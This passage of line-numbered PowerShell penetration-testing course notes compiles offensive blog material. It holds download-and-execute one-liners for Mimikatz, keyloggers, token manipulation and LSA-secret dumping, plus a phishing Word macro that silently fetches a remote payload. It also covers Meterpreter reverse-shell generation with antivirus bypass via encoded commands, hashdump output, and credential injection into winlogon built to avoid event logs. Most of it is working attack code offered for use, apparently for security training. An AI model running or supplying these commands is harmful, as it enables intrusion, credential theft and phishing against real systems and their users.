695 | powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Mimikatz.ps1') | Out-File -Encoding ASCII Invoke-Mimikatz.ps1; Import-Module .\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz" | |
696 | ||
697 | ||
698 | ||
699 | ||
700 | ||
701 | ********************************** Token Manipulation to escalate (must be run as an Administrator) ********************************** | |
702 | powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://Strategic-Sec-Ubuntu-VM-IP/powersploit/Exfiltration/Invoke-TokenManipulation.ps1') ; Invoke-TokenManipulation" | |
703 | ||
704 | powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-TokenManipulation.ps1') | Out-File -Encoding ASCII Invoke-TokenManipulation.ps1; Import-Module .\Invoke-TokenManipulation.ps1 ; Invoke-TokenManipulation" | |
705 | ||
706 | ||
707 | ||
708 | ||
709 | ||
710 | ||
711 | ||
712 | ||
713 | ********************************** Nihsang payload which Scan IP-Addresses, Ports and HostNames ********************************** | |
714 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Invoke-PingSweep.ps1','%TEMP%\Invoke-PingSweep.ps1') | |
715 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-PingSweep.ps1 -StartAddress 192.168.6.50 -EndAddress 192.168.6.100 -ResolveHost -ScanPort | |
716 | ||
717 | ||
718 | ||
719 | ||
720 | ||
721 | ||
722 | ********************************** Nihsang payload which Scan IP-Addresses, Ports and HostNames ********************************** | |
723 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Port-Scan.ps1','%TEMP%\Port-Scan.ps1') | |
724 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Port-Scan.ps1 -StartAddress 192.168.6.50 -EndAddress 192.168.6.100 -ResolveHost -ScanPort | |
725 | ||
726 | ||
727 | ||
728 | ||
729 | ||
730 | ********************************** Nishang Payload which gathers juicy information from the target. ********************************** | |
731 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Get-Information.ps1','%TEMP%\Get-Information.ps1') | |
732 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-Information.ps1 | |
733 | ||
734 | ||
735 | ||
736 | ||
737 | ||
738 | ********************************** Nishang Payload which gathers juicy information from the target. ********************************** | |
739 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Information_Gather.ps1','%TEMP%\Information_Gather.ps1') | |
740 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Information_Gather.ps1 | |
741 | ||
742 | ||
743 | ||
744 | ||
745 | ||
746 | ********************************** Nishang script which can drop and execute executables on multiple computers. ********************************** | |
747 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Run-EXEonRemote.ps1','%TEMP%\Run-EXEonRemote.ps1') | |
748 | powershell.exe -ExecutionPolicy Bypass -command Invoke-Command -FilePath %TEMP%\Run-EXEonRemote.ps1 -ComputerName Test-PC | |
749 | ||
750 | ||
751 | ||
752 | ||
753 | ||
754 | ********************************** Nishang Payload which logs keys. ********************************** | |
755 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Keylogger.ps1','%TEMP%\Keylogger.ps1') | |
756 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Keylogger.ps1 16e7a8a83f04eec8ab6bc1bce9d103e3 juraghh@gmail.com ITp!Ka3099 1 http://example.com stopthis | |
757 | ||
758 | ||
759 | ||
760 | ||
761 | ||
762 | ********************************** Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning ********************************** | |
763 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Browse_Accept_Applet.ps1','%TEMP%\Browse_Accept_Applet.ps1') | |
764 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Browse_Accept_Applet.ps1 http://Strategic-Sec-Ubuntu-VM-IP:8080/JavaExploit | |
765 | ||
766 | ||
767 | ||
768 | ||
769 | ********************************** Nishang Payload which dumps keys for WLAN profiles. ********************************** | |
770 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Get-WLAN-Keys.ps1','%TEMP%\Get-WLAN-Keys.ps1') | |
771 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-WLAN-Keys.ps1 | |
772 | ||
773 | ||
774 | ||
775 | ||
776 | ||
777 | ********************************** Nishang payload which extracts LSA Secrets from local computer. ********************************** | |
778 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Get-LSASecret.ps1','%TEMP%\Get-LSASecret.ps1') | |
779 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-LSASecret.ps1 -filename .\servers.txt | |
780 | ||
781 | ||
782 | ||
783 | ||
784 | ||
785 | ||
786 | ||
787 | ||
788 | ||
789 | ||
790 | ||
791 | ########################## | |
792 | #Phishing with PowerShell# | |
793 | ########################## | |
794 | ||
795 | Reference: | |
796 | http://securitypadawan.blogspot.com/2014/01/phishing-with-powershell.html | |
797 | http://www.rapid7.com/db/modules/exploit/windows/misc/psh_web_delivery | |
798 | ||
799 | I have seen quite a few tweets/comments/etc about using Powershell's functionality within the context of a Microsoft Office document/VBA (https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode). I am going to share a way I have been leveraging Powershell for payload delivery during phishing engagements for a while now to achieve the same end result in a much simpler fashion. The two stages are as follows: | |
800 | ||
801 | Attacker Machine: | |
802 | msf > use exploit/windows/misc/psh_web_delivery | |
803 | msf exploit(psh_web_delivery) > set SRVHOST Strategic-Sec-Ubuntu-VM-IP | |
804 | msf exploit(psh_web_delivery) > set URIPATH boom | |
805 | msf exploit(psh_web_delivery) > exploit | |
806 | ||
807 | VBA Macro: | |
808 | Sub AutoOpen() | |
809 | ||
810 | Call Shell("powershell.exe -w hidden -nop -ep bypass -c ""IEX ((new-object net.webclient).downloadstring('http://Strategic-Sec-Ubuntu-VM-IP:8080/boom'))""", 1) | |
811 | End Sub | |
812 | ||
813 | Save the document as a macro-enabled file. | |
814 | Send to target, and upon opening.... | |
815 | ||
816 | ||
817 | ||
818 | ||
819 | ||
820 | ||
821 | Meanwhile back at the bat cave... | |
822 | ||
823 | ||
824 | ||
825 | ||
826 | ||
827 | ||
828 | ||
829 | ##################################### | |
830 | #Bypassing Antivirus with PowerShell# | |
831 | ##################################### | |
832 | ||
833 | Reference: | |
834 | https://www.fishnetsecurity.com/6labs/blog/bypassing-antivirus-powershell | |
835 | ||
836 | On a recent penetration test, I ran into a number of challenges overcoming antivirus on compromised machines. Although I had already obtained domain administrator credentials, a number of roadblocks existed that prevented me from traversing the internal network: | |
837 | ||
838 | Remote Desktop was disabled on roughly 75% of the Windows servers. Although I had a clear-text password, I could not leverage RDP to interact with the systems. | |
839 | Antivirus was preventing all of my commonly used payloads from executing. Including all my attempts at using Metasploit's meterpreter, shell, upexec, exec, etc. modules. Manual encoding of custom PE files also failed to bypass AV. | |
840 | To fully leverage the domain admin credentials, I needed a reliable method to access all the Windows servers on the network without interference from Antivirus. Without RDP, I needed to accomplish this through SMB. | |
841 | ||
842 | The solution I present below accomplishes this task by utilizing SysInternals psexec to gain a remote command prompt on the victim. Utilizing this command prompt, I then execute a set of PowerShell commands to upgrade my access to a Meterpreter shell all the while staying hidden from Antivirus. The techniques presented here, while not likely to be bleeding edge, attempt to consolidate a number of disjoint topics into a useful penetration testing scenario. | |
843 | ||
844 | Challenge | |
845 | ||
846 | There are a number of challenges that need to be overcome. Of course, evading antivirus is the ultimate challenge. However, limitations in the number of characters that can be passed via the Windows command prompt presents another challenge that needs to be considered. Additionally, PowerShell may limit a user's ability to execute scripts via its Execution Policy. Although this can be changed, I generally prefer to avoid altering the target machine. | |
847 | ||
848 | Here's how I'll be overcoming these challenges: | |
849 | ||
850 | Evading Antivirus: Execute the Meterpreter shellcode in memory to avoid AV signature detection | |
851 | Execution Policy Preventing the Execution of PowerShell Scripts: Execute the commands via the -command and -encodedCommand PowerShell switches | |
852 | Limitations on Windows Command Length: I'll split the commands up into multiple steps and, where needed, execute them using a PowerShell variable which does not have the same size restriction | |
853 | Overview | |
854 | ||
855 | The process, as I executed it, loosely adheres to the following steps: | |
856 | ||
857 | Generate the Meterpreter payload, encode it, and save it within an accessible location on the attacking machine (e.g. Apache's /var/www directory). | |
858 | Start a Meterpreter listener on the attacking machine | |
859 | Utilize SysInternals psexec to obtain a command prompt on the target machine | |
860 | From the command prompt, execute a PowerShell command to download the payload generated in step one. | |
861 | From the command prompt, execute another PowerShell command which reads in our payload and executes the encoded version of it. | |
862 | The Setup | |
863 | ||
864 | In my scenario, there are 3 machines in play: | |
865 | ||
866 | The Windows target - 192.168.3.93 | |
867 | The attacker's Strategicsec Ubuntu machine - Strategic-Sec-Ubuntu-VM-IP | |
868 | The attacker's Windows machine (used for running psexec standalone). Running as a VM - IP address is inconsequential. | |
869 | The Preparation | |
870 | ||
871 | Let's get started. Let's start by generating a PowerShell script which executes our Meterpreter payload. This is simple by using msfpayload and msfencode: | |
872 | ||
873 | msfpayload windows/meterpreter/reverse_tcp LHOST=Strategic-Sec-Ubuntu-VM-IP LPORT=443 R | msfencode -t psh -a x86 | |
874 | ||
875 | While it's fresh on our minds, start the multi/handler in Metasploit to listen on Strategic-Sec-Ubuntu-VM-IP:443. | |
876 | ||
877 | Although there's likely a quicker way to do the next steps, I chose to utilize my Windows VM. Start by copying the PSH script that was output above. In a Windows command prompt, perform the following: | |
878 | ||
879 | c:\> powershell | |
880 | ||
881 | PS c:\> $cmd = '<PASTE THE CONTENTS OF THE PSH SCRIPT HERE>' | |
882 | ||
883 | PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd) | |
884 | ||
885 | PS c:\> $e = [Convert]::ToBase64String($u) | |
886 | ||
887 | PS c:\> $e | |
888 | ||
889 | The above converts our script to Unicode and then Base64 encodes it. A couple of notes... Replace everything in red above (including the '<' and '>' characters) with the script generated by msfpayload/msfencode. This will be a multiline command. Ensure the single quotes are present. You may have to press "Enter" a few times after typing the closing single quote. | |
890 | ||
891 | The last line in the PowerShell series simply prints the encoded payload to the screen. Copy this value and clean it up by removing all new lines. Your encoded data must not span multiple lines. | |
892 | ||
893 | Save the cleaned up, encoded payload on the attacking machine under a directory served by Apache (or whatever web server you prefer). In my case, I'll save it as "shell.txt" in /var/www. Start your web server and verify that the file is accessible. | |
894 | ||
895 | The Execution | |
896 | ||
897 | On your Windows machine, lets get a remote command prompt on the target (this assumes that you have valid credentials on the target). | |
898 | ||
899 | c:\> psexec \\10.1.1.10 -u domain\jdoe -p s3cr3t cmd.exe | |
900 | ||
901 | With all the setup in place, we'll now proceed to download our encoded payload and execute it. | |
902 | ||
903 | In the command prompt we just obtained, enter the following to download our encoded payload: | |
904 | ||
905 | c:\> powershell -noprofile -noninteractive -command "& {$client=new-object System.Net.WebClient;$client.DownloadFile('http://10.1.1.20/shell.txt','c:\windows\temp\_shell.txt')}" | |
906 | ||
907 | For those of you familiar with WGET, the above basically duplicates that functionality. It downloads the file "shell.txt" from http://10.1.1.20 (our attacking machine with the web server running) and saves it to c:\windows\temp\_shell.txt on the target server. | |
908 | ||
909 | Now that we have the encoded shellcode on the target machine, we can execute the following from the same command prompt. | |
910 | ||
911 | c:\> powershell -noprofile -noninteractive -noexit -command "& {$cmd=type 'c:\windows\temp\_shell.txt';powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}" | |
912 | ||
913 | While there are likely more efficient ways to accomplish this command, what it's doing is grabbing the contents of our encoded shellcode and storing it in a variable (via the 'type' command). It then executes an additional PowerShell command. By using the -encodedCommand switch we can pass it our encoded shellcode. This allows us to execute the script via a command line rather than a script (which avoids any ExecutionPolicy restrictions). Additionally, storing the payload in the $cmd variable allows us to bypass command length restrictions of the command prompt. | |
914 | ||
915 | Success | |
916 | ||
917 | Depending on your connection speed, the above command may take some time to execute. When it's complete, we are greeted with the sweet site of a new Meterpreter session untouched by AV... | |
918 | ||
919 | [*] Sending stage (752128 bytes) to 10.1.1.10 | |
920 | [*] Meterpreter session 3 opened (10.1.1.20:443 -> 10.1.1.10:2214) at 2012-08-21 09:06:50 -0400 | |
921 | ||
922 | meterpreter > getuid | |
923 | Server username: domain\jdoe | |
924 | meterpreter > sysinfo | |
925 | Computer : VICTIMSVR | |
926 | OS : Windows .NET Server (Build 3790, Service Pack 2). | |
927 | Architecture : x86 | |
928 | System Language : en_US | |
929 | Meterpreter : x86/win32 | |
930 | meterpreter > hashdump | |
931 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:d<snip>3::: | |
932 | jdoe:500:aad3b435b51404eeaad3b435b51404ee:d<snip>3::: | |
933 | ||
934 | ||
935 | ||
936 | ||
937 | ||
938 | ||
939 | ######################################################### | |
940 | #Authenticated Metasploit Payloads via Powershell Psexec# | |
941 | ######################################################### | |
942 | ||
943 | Reference: | |
944 | http://securitypadawan.blogspot.com/2013/07/authenticated-metasploit-payloads-via.html | |
945 | ||
946 | I love powershell and in a windows environment, powershell is king. Add the ability to perform native code injection and sprinkle in some metasploit and the possibilities are endless. There is a really awesome collection of tools called Powersploit by @mattifestation . These are powershell scripts that take advantage of "features" of powershell to do some cool stuff. | |
947 | ||
948 | @obscuresec is also a contributor to the powersploit project, and not too long ago he had a really cool blog post detailing one way to execute a meterpreter payload within a powershell process. I thought this idea was really cool so I decided to try and take a stab at writing a metasploit module that implements a slightly modified version of this technique. | |
949 | ||
950 | Many times in a penetration test I find myself having valid credentials to a target machine, but my payload keeps getting busted when I try and upgrade my shell to meterpreter. | |
951 | ||
952 | This module allows you to use metasploit's existing powershell encoded payloads, or you can specify a file to use that contains a powershell script (such as powersploit) that will be executed on the target machine within the powershell process using the LPATH variable. | |
953 | ||
954 | At the very minimum, will need to set the LHOST, RHOST, ARCH, SMBUSER and SMBPASS variables. | |
955 | ||
956 | And if all goes as planned... | |
957 | ||
958 | Also we can see that the only thing spawned on the target machine is one powershell process: | |
959 | ||
960 | You can find the module on github https://github.com/jakxx/metasploit-framework/blob/powershell_psexec/modules/exploits/windows/powershell/powershell_psexec.rb. | |
961 | ||
962 | ||
963 | ################################################ | |
964 | #PowerSploit: The Easiest Shell You’ll Ever Get# | |
965 | ################################################ | |
966 | ||
967 | Reference: | |
968 | https://www.pentestgeek.com/2013/09/18/invoke-shellcode/ | |
969 | ||
970 | Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit. | |
971 | ||
972 | PowerSploit is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET so you may already be using it! Many of the scripts in the project are extremely useful in post-exploitation in Windows environments. The project was started by Matt Graeber who is the author of the function we will use in this tutorial: Invoke-Shellcode. | |
973 | ||
974 | ||
975 | In order for this to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let’s automated it with a really simple Python script: | |
976 | ||
977 | script PowerSploit: The Easiest Shell Youll Ever Get | |
978 | ||
979 | To start the multi/handler and configure it, we just run the script: | |
980 | ||
981 | python StartListener.py 192.168.0.15 443 | |
982 | ||
983 | Now that our handler is ready, we can move on to executing our shell. The first thing I did to make the next step easier to type is shorten the github link to Invoke-Shellcode with bitly: | |
984 | ||
985 | bitly PowerSploit: The Easiest Shell Youll Ever Get | |
986 | ||
987 | Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the function and pass it to Invoke-Expression to put it into memory: | |
988 | ||
989 | IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’) | |
990 | ||
991 | Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener: | |
992 | ||
993 | Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.0.15 –Lport 443 –Force | |
994 | ||
995 | We can actually combine these commands to run a single command to execute our shell: | |
996 | ||
997 | IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 172.0.1.200 –Lport 443 –Force | |
998 | ||
999 | powershell PowerSploit: The Easiest Shell Youll Ever Get | |
1000 | ||
1001 | Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process: | |
1002 | ||
1003 | meterpreter PowerSploit: The Easiest Shell Youll Ever Get | |
1004 | ||
1005 | That is the easiest and most convenient AV-bypass I have ever seen! Just open PowerShell and type a command. Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier. You can find more ways at my blog and by following me on twitter. Also, join me at Derbycon when I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall and how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber. I hope to see you all there! | |
1006 | ||
1007 | ||
1008 | ||
1009 | ||
1010 | ############################################# | |
1011 | #Injecting Logon Credentials With PowerShell# | |
1012 | ############################################# | |
1013 | ||
1014 | Reference: | |
1015 | http://clymb3r.wordpress.com/2013/11/17/injecting-logon-credentials-with-powershell/ | |
1016 | ||
1017 | In this article I will introduce a new script, Inject-LogonCredentials, that uses PowerShell (specifically, the Invoke-ReflectivePEInjection script) to inject credentials in memory. | |
1018 | ||
1019 | I’ll start with a brief review of the current commonly used methods of using stolen credentials. | |
1020 | ||
1021 | Doing a RunAs with a users credential. The downside of a RunAs is that it creates an “Explicit Credential Logon” event in the Windows event logs (event id 4648). As you can see in the picture below, this event shows the account being logged in with (testuser), and the account initiating the new logon (joe). It also shows the process that called the logon API. Incident responders commonly look for this event as an indicator of lateral movement, so it should be avoided. | |
1022 | Injecting credentials directly in to LSASS. This technique, used by Windows Credential Editor, involves injecting a DLL in to LSASS and modifying its memory to add your credentials. Unfortunately, if LSASS is set to be a protected process in Windows 8.1 this technique fails because only specially signed processes can manipulate protected processes. While it is true that tools such as Mimikatz can disable protected processes, I do not want to load a kernel driver (which is what Mimikatz does) every time I pivot. | |
1023 | Implementing your own authentication protocols. Examples include the NTLM module in Metasploit, which can perform NTLM authentication without relying on Windows authentication. This has the benefit of staying out of the logs (since it does not rely on Windows authentication libraries). Unfortunately it limits you to using Metasploit modules that use the Metasploit NTLM module. This module only supports NTLM, and not Kerberos. One new feature of Windows 8.1 allows user accounts to be banned from using NTLM, which will prevent this module from functioning. | |
1024 | As noted, doing a RunAs throws a suspicious event log because it allows an incident responder to see that some random user is logging in with domain admin credentials (or other privileged credentials). Instead of simply doing a RunAs, I will do the following: | |
1025 | ||
1026 | Create a DLL that: | |
1027 | Opens a named pipe and reads a domain/username/password combination. | |
1028 | Read a logon type from the named pipe (current supported types are Interactive, RemoteInteractive, and NetworkCleartext). | |
1029 | Calls LsaLogonUser to create a logon with the credentials it was supplied, and as the logon type supplied. | |
1030 | Impersonates the token returned by LsaLogonUser with its current thread, which allows the token to be kidnapped by Invoke-TokenManipulation. | |
1031 | Reflectively inject this DLL in to winlogon.exe using Invoke-ReflectivePEInjection. | |
1032 | Supply the DLL with the username/password to create a logon for by using a named pipe. | |
1033 | Call LsaLogonUser with the supplied credentials and logon type within winlogon.exe. | |
1034 | The differences between this script and a normal RunAs are: | |
1035 | ||
1036 | Process calling the logon API will show up as Winlogon.exe. | |
1037 | User initiating the logon is SYSTEM, not a random user account. | |
1038 | You can specify the logon type. For example, you can make LSASS think the account is connecting via RDP, which might be normal. You can also make LSASS think the account is a local logon (someone physically using the computer). | |
1039 | ||
1040 | RunAs 4648 Event Log | |
1041 | RunAs 4648 Event Log | |
1042 | ||
1043 | 4648 Event Log With Inject-LogonCredentials | |
1044 | 4648 Event Log With Inject-LogonCredentials | |
1045 | ||
1046 | 4624 With Inject-LogonCredentials | |
1047 | 4624 With Inject-LogonCredentials | |
1048 | ||
1049 | As you can see, everything that was suspicious in the 4648 event log is gone. But how do you use these credentials now that they are in memory? | |
1050 | ||
1051 | Once you run the script, you can use Invoke-TokenManipulation (or incognito if you are using Metasploit) to kidnap the token of the new logon. You can use this impersonated token to pivot off box using things such as SMB, WMI, and PowerShell remoting. | |
1052 | ||
1053 | Here’s an example: | |
1054 | ||
1055 | Inject-LogonCredentials –DomainName demo –UserName administrator –Password Password1 –ExistingWinLogon | |
1056 | Invoke-TokenManipulation –CreateProcess “c:\windows\system32\windowspowershell\v1.0\powershell.exe” -UserName “demo\administrator” | |
1057 | ||
1058 | It’s worth mentioning that the script currently has two modes: | |
1059 | ||
1060 | ExistingWinLogon: Injects the DLL in to an already running winlogon process. The DLL will never be unloaded from this process so there is forensic evidence that is left behind if someone does analysis on the winlogon process. | |
1061 | NewWinLogon: Creates a new winlogon process, running as SYSTEM, using token kidnapping. Injects the logon DLL in to this new winlogon process. Once you are done, you can kill the process. This allows you to delete the process and wipe away DLL injection evidence, but Windows will log that PowerShell.exe created winlogon, which would look strange if anyone notices. | |
1062 | Hopefully this has helped illustrate how Invoke-ReflectivePEInjection can be used to do awesome things.You can find the script at: | |
1063 | https://github.com/clymb3r/PowerShell/tree/master/Inject-LogonCredentials | |
1064 | ||
1065 | As usual, it will also be added to PowerSploit. | |
1066 | ||
1067 | ############################### | |
1068 | #Veil-PowerView: A Usage Guide# | |
1069 | ############################### | |
1070 | ||
1071 | Reference: | |
1072 | http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ | |
1073 | ||
1074 | [Note: this topic was cross-posted on the Veil-Framework site (https://www.veil-framework.com/veil-powerview-usage-guide/)] | |
1075 | ||
1076 | Veil-PowerView (https://www.veil-framework.com/veil-powerview/)is a project that was originally prompted by a client who locked down their corporate machines by disabling all “net *” commands for normal users. While building pure Powershell replacements to easily bypass this protection, I began to explore what else could be done with Powershell from a domain and network situational awareness perspective. Being inspired by my boss @davidpmcguire, and drawing on existing work from @mubix, the offensive Powershell community (@obscuresec, @mattifestation, and DarkOperator), and the authors of various Metasploit modules like local_admin_search_enum, I began to build more interesting functionality to abuse Windows domains. Now that Veil-PowerView has been tested in multiple, diverse environments and has started to mature a bit, I wanted to put together a quick guide on using some of PowerView’s interesting functionality. | |
1077 | ||
1078 | First, some basic usage: to get the most out of PowerView, you need a current Windows workstation with domain credentials. The credentials don’t need to be privileged, as many of the API methods abused by the tool only need basic user access. To load up PowerView, first download the raw powerview.ps1 (https://raw.githubusercontent.com/Veil-Framework/Veil-PowerView/master/powerview.ps1) script to a local location, and then launch Powershell: | |
1079 | ||
1080 | C:> powershell.exe -nop -exec bypass | |
1081 | Then import the PowerView module with the following: | |
1082 | ||
1083 | PS C:\> Import-Module [full path to powerview.ps1] | |
1084 | All of the PowerView cmdlets will now be exposed and tab completable (Invoke-[tab]). To get more information on any command, use get-help [cmdlet], with an optional -full flag to return complete information. I.E. “Get-Help Invoke-Netview -full“. To get a list of all the available functions, check the README.md. Arguments/flags for each cmdles should be tab completable, with something like “Invoke-Netview -[tab]“. If you want to output your results to a file, I recommend using the Powershell Out-File cmdlet, I.E. ”PS C:\> Invoke-Netview | Out-File -Encoding ASCII output.txt” (the -encoding flag is used since since Powershell defaults to Unicode). If you want detailed output for any of the PowerView commands, just add a “-Debug” flag, and if you want status output for any functions that enumerate multiple machines use “-Verbose”. | |
1085 | ||
1086 | Now, on to the fun stuff. PowerView provides replaces for almost all Windows net commands, letting you query users, machines, domain controllers, user descriptions, share, sessions, and more. The Get-Net* cmdlets should cover most of your needs. For example, the Get-NetComputers cmdlet will let you search for all systems in the domain, and you can provide wildcard searches for the -HostName, -OperatingSystem, and -ServicePack. If you want to use this find all Windows XP boxes on the domain, run: | |
1087 | ||
1088 | PS C:\> Get-NetComputers -OperatingSystem *xp* | |
1089 | Since we can search for operating systems and service packs, let’s take this one step further. How about finding all machines likely vulnerable to MS08-067, ping them and return any hosts that are up? There’s a function for that: | |
1090 | ||
1091 | PS C:\> Invoke-FindVulnSystems -Ping | |
1092 | One of the common things we do on assessments is check for overly permissive file shares that our current user can read. This used to be a pretty manual process, but now we can automate it easily. The following command will query AD for machines using Get-NetComputers, ping each machine to ensure it’s up and responsive, get a list of available shares for each machine using Get-NetShare, exclude PRINT$ and IPC$ from the output, and check if the current user has read access: | |
1093 | ||
1094 | PS C:\> Invoke-ShareFinder -Ping -ExcludePrint -ExcludeIPC -CheckShareAccess | |
1095 | Invoke-Netview is a port of Rob Fullers’s netview.exe tool. It uses native Windows API commands to get the sessions, shares, and loggedon users for target machines, often without needing administrative credentials. The following command will query AD for machines using Get-NetComputers, ping each machine to ensure it’s up and responsive, and wait for a delay of 10 seconds between touching each machine: | |
1096 | ||
1097 | PS C:\> Invoke-Netview -Ping -ExcludeShares -Delay 10 | |
1098 | A really useful thing on an assessment is to know where particular users are logged in. Say you compromise a user that has administrative access to local desktops on a domain. You can use functionality in PowerView to find where high value users (default “Domain Admins”) are logged in, and can even check if you have local admin on the found machines! The following command will query AD for machines using Get-NetComputers, ping each machine to ensure it’s up and responsive, query AD for members of the “Domain Admins” group, and then check if any users currently logged in/have a sessions on a machine match the target user list. Locations where Domain Admins are located are then displayed: | |
1099 | ||
1100 | PS C:\> Invoke-Userhunter -Ping | |
1101 | If you want to hunt for a specific user or userlist, or use a pre-populated host list instead of querying AD, there are flags for those actions as well: | |
1102 | ||
1103 | PS C:\> Invoke-UserHunter -UserName “jsmith” -HostList hosts.txt | |
1104 | An even stealthier way to find where target users are located is to find all the file servers mounted by users from their homeDirectory fields, and run a Get-NetSessions command on the found file servers. This will give you a large amount of information on most corporate networks with a minimal amount of traffic! Invoke-StealthUserHunter can automate all of this for you nicely: | |
1105 | ||
1106 | PS C:\> Invoke-StealthUserhunter -GroupName “Server Admins” | |
1107 | There are plenty of more functions and options in Veil-PowerView than what we covered here: I encourage you to check out PowerView’s README.md as well as the descriptive comments for each cmdlet in the source which detail use cases, arguments and outputs for each function. | |
1108 | ||
1109 | If you need to invoke PowerView in a non-interactive context, there are a few additional launching options. If you know the function and arguments you want to run (like Invoke-Netview) you can append the function name to the end of the PowerView file and run it with: | |
1110 | ||
1111 | C:\> powershell.exe -nop -exec bypass .\powerview.ps1 > output.txt | |
1112 | You can also run it straight without any script modifications with: | |
1113 | ||
1114 | C:\> powershell.exe -exec bypass -Command “& {Import-Module .\powerview.ps1; Invoke-Netview | Out-File -Encoding ascii output.txt}” | |
1115 | If you want to invoke everything without touching disk, use something like this: | |
1116 | ||
1117 | C:\> powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mYPUO4′); Invoke-NetView -Ping | Out-File -Encoding ascii netview.txt“ | |
1118 | There’s also a Metasploit module for running powershell commands through a session, post/windows/manage/powershell/exec_powershell. Before you use this module, first append the desired function and any arguments (i.e. “Invoke-StealthUserHunter”) to the end of powerview.ps1 on your attacker machine, and then specify the local path to the script in the module options. Metasploit will upload the script, run it on the target, retrieve the results and save them back to your local machine. | |
1119 | ||
1120 | If you have any questions on PowerView, hit me up at will [at] harmj0y.net, on twitter at @harmj0y, Freednode (harmj0y in #veil or #armitage), submit an issue on the official Github page, or come check out the Veil-Framework at BlackHat Arsenal. | |
1121 | ||
1122 | ||
1123 | ||
1124 | ######################## | |
1125 | #PowerUp: A Usage Guide# | |
1126 | ######################## | |
1127 | ||
1128 | Reference: | |
1129 | http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/ | |
1130 | ||
1131 | Note: this topic was cross-posted on the official Veris Group blog (http://www.verisgroup.com/2014/06/17/powerup-usage/). | |
1132 | ||
1133 | PowerUp (http://www.harmj0y.net/blog/powershell/powerup/) is the result of wanting a clean way to audit client systems for common Windows privilege escalation vectors. It utilizes various service abuse checks, .dll hijacking opportunities, registry checks, and more to enumerate common ways that you might be able to elevate on a target system. We’ve gotten the chance to test PowerUp in multiple environments, as well integrate public feedback, so I wanted to put together a quick usage guide for those wanting to check it out. | |
1134 | ||
1135 | To load up PowerUp, first download the raw script (https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1) to a local location, and then launch Powershell: | |
1136 | ||
1137 | ||
1138 | ||
1139 | C:> powershell.exe -nop -exec bypass | |
1140 | Then import the PowerUp module with the following: | |
1141 | ||
1142 | PS C:\> Import-Module .\PowerUp.ps1 | |
1143 | All of the PowerUp cmdlets will now be exposed and tab completable (Get-[tab]). To get more information on any command, use get-help [cmdlet], with an optional -full flag to return complete information. I.E. “Get-Help Get-ServiceEXEPerms -full“. To get a list of all the available functions, check the README.md (https://github.com/HarmJ0y/PowerUp/blob/master/README.md). If you want to output your results to a file, I recommend using the Powershell Out-File cmdlet, I.E. ”PS C:\> Get-ServicePerms | Out-File -Encoding ASCII checks.txt” (the -encoding flag is used since since Powershell defaults to Unicode). | |
1144 | ||
1145 | The most common way I end up using PowerUp is by using the Invoke-AllChecks function, which runs through all relevant checks for the machine and outputs a status report: | |
1146 | ||
1147 | PS C:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt | |
